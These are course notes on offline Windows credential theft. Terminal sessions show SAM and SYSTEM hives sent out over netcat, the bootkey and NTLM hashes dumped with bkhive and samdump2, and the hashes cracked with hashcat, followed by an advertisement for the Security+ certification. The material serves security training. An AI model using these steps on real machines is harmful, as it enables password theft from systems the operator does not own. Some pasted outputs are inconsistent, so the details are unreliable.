root@k:~# hashcat -m 100 -a 3 sam.hash -i --increment-min 1 --increment-max 5 ?d
Initializing hashcat v2.00 with 1 threads and 32mb segment-size...

Added hash from file sam.hash: 1 (1 salts)
Activating quick-digest mode for single hash

[s]tatus [p]ause [r]esume [b]ypass [q]uit =>

Input.Mode: Mask (?d) [1]
Index.....: 0/1 (segment), 10 (words), 0 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: - plains, - words
Progress..: 10/10 (100.00%)
Running...: --:--:--:--
Estimated.: --:--:--:--

[s]tatus [p]ause [r]esume [b]ypass [q]uit =>

Started Fri Apr 22 00:31:47 2016
Stopped Fri Apr 22 00:31:47 2016
```

Offline Password Cracking

Syskey tools

- The SAM database is encrypted with the RC4 algorithm using the bootkey

- The bootkey is stored in the SYSTEM hive file

- Bkhive

Extracts the bootkey from the SYSTEM hive file

Kali 2.0 dropped bkhive

Build and install it from source: http://http.us.debian.org/debian/pool/main/b/bkhive/

bkhive SYSTEM key

samdump2 SAM key (the samdump2 version has been updated and no longer supports this usage)

- Kali 1.x is recommended

```
root@k:~# mount /dev/sda2 /mnt/
root@K:/mnt# cd /mnt/Windows/System32/config
root@k:/mnt/Windows/System32/config# ls
root@k:/mnt/Windows/System32/config# samdump2 SYSTEM SAM -o sam.hash
root@k:/mnt/Windows/System32/config# cat sam.hash
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
w7:1000:aad3b435b51404eeaad3b435b51404ee:91d0a3767644eea90922f597bde98aae:::
```

```
root@k:~# hash-identifier
-------------------------------------------------------------------------
HASH: 91d0a3767644eea90922f597bde98aae

Possible Hashs:
[+]  MD5
[+]  Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

Least Possible Hashs:
[+]  RAdmin v2.x
[+]  NTLM
[+]  MD4
[+]  MD2
[+]  MD5(HMAC)
[+]  MD4(HMAC)
[+]  MD2(HMAC)
[+]  MD5(HMAC(Wordpress))
[+]  Haval-128
[+]  Haval-128(HMAC)
[+]  RipeMD-128
[+]  RipeMD-128(HMAC)
[+]  SNEFRU-128
[+]  SNEFRU-128(HMAC)
[+]  Tiger-128
[+]  Tiger-128(HMAC)
[+]  md5($pass.$salt)
[+]  md5($salt.$pass)
[+]  md5($salt.$pass.$salt)
[+]  md5($salt.$pass.$username)
[+]  md5($salt.md5($pass))
[+]  md5($salt.md5($pass))
[+]  md5($salt.md5($pass.$salt))
[+]  md5($salt.md5($pass.$salt))
[+]  md5($salt.md5($salt.$pass))
[+]  md5($salt.md5(md5($pass).$salt))
[+]  md5($username.0.$pass)
[+]  md5($username.LF.$pass)
[+]  md5($username.md5($pass).$salt)
[+]  md5(md5($pass))
[+]  md5(md5($pass).$salt)
[+]  md5(md5($pass).md5($salt))
[+]  md5(md5($salt).$pass)
[+]  md5(md5($salt).md5($pass))
[+]  md5(md5($username.$pass).$salt)
[+]  md5(md5(md5($pass)))
[+]  md5(md5(md5(md5($pass))))
[+]  md5(md5(md5(md5(md5($pass)))))
[+]  md5(sha1($pass))
[+]  md5(sha1(md5($pass)))
[+]  md5(sha1(md5(sha1($pass))))
[+]  md5(strtoupper(md5($pass)))
-------------------------------------------------------------------------
HASH: ^CTraceback (most recent call last):
  File "/usr/bin/hash-identifier", line 556, in <module>
    hash = raw_input(" HASH: ")
KeyboardInterrupt
```

```
root@k:~# echo 91d0a3767644eea90922f597bde98aae > sam1.hash
root@k:~# hashcat -m 1000 sam1.hash pass.lst
Initializing hashcat v2.00 with 1 threads and 32mb segment-size...

Added hash from file sam.hash: 1 (1 salts)
Activating quick-digest mode for single hash

[s]tatus [p]ause [r]esume [b]ypass [q]uit =>

Input.Mode: Mask (pass.lst)
Index.....: 0/1 (segment), 499 (words), 639632 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: - plains, - words
Progress..: 4999/4999 (93.24%)
Running...: --:--:--:--
Estimated.: --:--:--:--

Started Fri Apr 22 00:31:47 2016
Stopped Fri Apr 22 00:31:47 2016
```

```
root@k:~# hashcat -m 1000 -a 3 sam1.hash -i --increment-min 4 --increment-max 6 ?a?a?a?a?a?a
Initializing hashcat v2.00 with 1 threads and 32mb segment-size...

Added hash from file sam.hash: 1 (1 salts)
Activating quick-digest mode for single hash

[s]tatus [p]ause [r]esume [b]ypass [q]uit =>

Input.Mode: Mask (?a?a?a?a) [4]
Index.....: 0/1 (segment), 499 (words), 639632 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: 9.43M plains, 9.43M words
Progress..: 81450625/81450625 (100.0%)
Running...: 00:00:00:09
Estimated.: --:--:--:--

......

Started Fri Apr 22 00:31:47 2016
Stopped Fri Apr 22 00:31:47 2016
```

```
root@k:~/Downloads# tar zxvf bkhive_1.1.1.orig.tar.gz
bkhive-1.1.1/
bkhive-1.1.1/Makefile
bkhive-1.1.1/README
bkhive-1.1.1/bkhive.1
bkhive-1.1.1/hive.h
bkhive-1.1.1/bkhive.c
bkhive-1.1.1/AUTHORS
bkhive-1.1.1/ChangeLog
bkhive-1.1.1/COPYING
bkhive-1.1.1/Makefile.win32
bkhive-1.1.1/hive.c
root@k:~/Downloads# cd bkhive-1.1.1/
root@k:~/Downloads/bkhive-1.1.1# apt-get install libssl     // tab completion candidates
libssl1.0.2       libssl-dev        libssl-ocaml
libssl1.0.2-dbg   libssl-doc        libssl-ocaml-dev
root@k:~/Downloads/bkhive-1.1.1# apt-get install libssl-dev
root@k:~/Downloads/bkhive-1.1.1# make
/usr/bin/gcc -c    -o bkhive.o bkhive.c
/usr/bin/gcc -c    -o hive.o hive.c
/usr/bin/gcc   -o bkhive hive.o bkhive.o
###############################################################
Bkhive 1.0.0 : extract Syskey bootkey from the system hive file
Copyright (C) 2004-2005 Nicola Cuomo <ncuomo@studenti.unina.it>
Distributed under terms of GNU General Public License version 2
###############################################################
root@k:~/Downloads/bkhive-1.1.1# make install
###############################################################
Bkhive 1.0.0 : extract Syskey bootkey from the system hive file
Copyright (C) 2004-2005 Nicola Cuomo <ncuomo@studenti.unina.it>
Distributed under terms of GNU General Public License version 2
###############################################################
Creating directories...
/usr/bin/install -d -m 755 -o root -g root /usr/local/bin
/usr/bin/install -d -m 755 -o root -g root /usr/local/share/man/man1
Copying binary...
/usr/bin/install bkhive -m 755 -o root -g root /usr/local/bin
Installing man page...
/usr/bin/install bkhive.1 -m 644 -o root -g root /usr/local/share/man/man1
```

```
root@k:~/Downloads/bkhive-1.1.1# apt-get install libssl-dev
Reading package lists... Done
Building dependency tree
Reading state information... Done
libssl-dev is already the newest version (1.0.2g-1).
You might want to run 'apt-get -f install' to correct these:
The following packages have unmet dependencies:
 samdump2 : Depends: libssl1.0.0 (>= 1.0.0) but it is not installable
            Recommends: bkhive but it is not going to be installed
E: Unmet dependencies. Try 'apt-get -f install' with no packages (or specify a solution).
root@k:~/Downloads/bkhive-1.1.1# apt-get -f install
Reading package lists... Done
Building dependency tree
Reading state information... Done
Correcting dependencies... Done
The following additional packages will be installed:
  samdump2
The following packages will be upgraded:
  samdump2
1 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
1 not fully installed or removed.
Need to get 0 B/16.6 kB of archives.
After this operation, 2,048 B of additional disk space will be used.
Do you want to continue? [Y/n]
Reading changelogs... Done
(Reading database ... 418766 files and directories currently installed.)
Preparing to unpack .../samdump2_3.0.0-3+b1_amd64.deb ...
Unpacking samdump2 (3.0.0-3+b1) over (1.1.1-1.1) ...
Processing triggers for man-db (2.7-5.1) ...
Setting up samdump2 (3.0.0-3+b1) ...
root@k:~/Downloads/bkhive-1.1.1# apt-get purge samdump2        // remove samdump2
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages will be REMOVED:
  samdump2*
0 upgraded, 0 newly installed, 1 to remove and 0 not upgraded.
After this operation, 43.0 kB disk space will be freed.
Do you want to continue? [Y/n]
(Reading database ... 418766 files and directories currently installed.)
Removing samdump2 (3.0.0-3+b1) ...
Processing triggers for man-db (2.7-5.1) ...
root@k:~/Downloads/bkhive-1.1.1# apt-get install libssl-dev
Reading package lists... Done
Building dependency tree
Reading state information... Done
libssl-dev is already the newest version (1.0.2g-1).
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
```

```
root@k:~/Downloads/bkhive-1.1.1# bkhive
bkhive 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author : ncuomo@studenti.unina.it

Usage:
bkhive systemhive keyfile
```

```
root@k:~/Downloads/bkhive-1.1.1# nc -nvlp 333 > SYSTEM
root@kali:~# nc 192.168.1.117 333 < SYSTEM -q 1
root@k:~/Downloads/bkhive-1.1.1# nc -nvlp 333 > SAM
root@kali:~# nc 192.168.1.117 333 < SAM -q 1
root@k:~/Downloads/bkhive-1.1.1# bkhive SYSTEM bkry
bkhive 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author : ncuomo@studenti.unina.it

Root Key : CMI-CreateHive{2A7FB991-7BBE-4F9D-B91E-7CB51D4737F5}
Default ControlSet: 001
Bootkey: 7ccc5d2742c91350cadc092c20cb5e8f
root@k:~/Downloads/bkhive-1.1.1# cat bk     // tab completion candidates
bkhive     bkhive.1  bkhive.c  bkhive.o  bkry
root@k:~/Downloads/bkhive-1.1.1# cat bkry
root@k:~/Downloads/bkhive-1.1.1# mv bkry key
root@k:~/Downloads/bkhive-1.1.1# apt-get install samdump2
root@k:~/Downloads/bkhive-1.1.1# samdump2 SAM key
```

These notes were taken by a student of the 安全牛课堂 (Security Bull Classroom); to watch this course or for more information-security material, head over to the 安全牛课堂.

Why is the Security+ certification the hottest certification of the Internet+ era?

First, an introduction to Security+.

Security+ is a vendor-neutral third-party certification issued by CompTIA, the Computing Technology Industry Association of the United States. Together with CISSP, ITIL and others it is counted among the ten most popular certifications in the international IT industry; compared with CISSP, which leans towards information-security management, Security+ leans towards information-security technology and operations.

Earning the certification demonstrates competence in network security, compliance and operational security, threats and vulnerabilities, application, data and host security, access control and identity management, and cryptography. Because the exam is not easy and the certification is highly valued, it has been widely adopted by enterprises and security professionals worldwide.

Why is Security+ so popular?

Reason one: among all information-security certifications, those that focus on security technology are a blank spot, and Security+ fills exactly that gap.

The information-security certifications currently recognised in the industry are mainly CISP and CISSP, but both lean towards security management; technical knowledge is covered broadly and shallowly, and the exams skim over it. Moreover, CISSP requires five or more years of information-security work experience, and CISP requires a college diploma plus four years of work experience; these requirements block the path to certification for capable and ambitious young people. In practice, whether it is job hunting, promotion and pay rises, or listing staff in a bid, certifications are indispensable, and this is unfair to younger people. Security+ clears these obstacles from their career path: because it focuses on security technology, it has no particular work-experience requirement. As long as you have an IT background and want to advance, you can study for and sit the exam.

Reason two: a tool for IT operations staff to do their job and change their fortunes.

In banking, securities, insurance, telecommunications and similar industries there are a great many IT operations staff, and the work covers a very broad range: it is a composite technical role spanning networks, systems, security, application architecture and storage. It may lack the programmers' tragic grandeur of "live as a bachelor, die writing code", but it has its own lament of "hoeing under the noonday sun is nothing compared to the misery of ops". Facing computers and machines every day, it is hard not to feel lost about one's career over time. The international Security+ certification lets ambitious operations staff learn network-security knowledge and master security practice, steering their career towards network security and helping to relieve the domestic shortage of information-security talent. And even without changing career, learning security and obtaining a security certification is indispensable for doing operations work well.

Reason three: practical, international, convenient to sit, and moderately priced!

CompTIA, the most influential global organisation in the ICT field, is professional, fair and impartial in information-security talent certification. Security+ emphasises hands-on skills and is closely tied to the daily work of front-line engineers, making it suitable for IT staff at banks, securities firms, insurers, Internet companies and the like. As an international certification it is widely recognised in 147 countries worldwide.

Under the current information-security wave, talent is the key to the development of information security. Domestic information-security talent is in very short supply, and Security+ is sure to become the hottest information-security certification.
